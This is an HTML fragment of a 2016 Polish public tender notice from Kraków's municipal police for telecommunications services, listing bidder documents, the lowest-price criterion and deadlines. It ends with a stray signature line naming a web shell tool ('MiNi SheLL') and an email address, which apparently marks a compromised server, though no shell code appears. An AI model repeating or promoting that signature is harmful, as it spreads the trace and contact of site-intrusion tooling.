<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnego szczególnego warunku. 
Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty 
oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych    
w art. 22 ust. 1 ustawy Pzp, zgodnie z załącznikiem nr 2 do SIWZ. Wykonawca musi także udokumentować, że jest ubezpieczony od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności dla spełnienia ww. warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Zaświadczenie o dokonaniu wpisu do rejestru przedsiębiorców telekomunikacyjnych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej (potwierdzona przez Wykonawcę za zgodność z oryginałem kopia zaświadczenia).
2. Regulamin świadczenia usług przez Wykonawcę.
3. Cennik usług telekomunikacyjnych.
4. Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, 
na podstawie której dokonano wyboru Wykonawcy, chyba, że będą to zmiany wynikające z następujących przesłanek:
1)	zmiana podwykonawcy, z zachowaniem warunków, o których mowa w art. 36 b ust. 1 ustawy Pzp;
2)	przekształcenie formalno - prawne którejkolwiek ze Stron umowy lub
 zmiany teleadresowe;
3)	zaistnienie innych okoliczności niezależnych od Wykonawcy, których nie można było przewidzieć w dniu zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl/ST<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Straż Miejska Miasta Krakowa
ul. Dobrego Pasterza 116
31-416 Kraków
pok. 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2016 godzina 10:00, miejsce: Straż Miejska Miasta Krakowa
ul. Dobrego Pasterza 116
31-416 Kraków
pok. 315.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com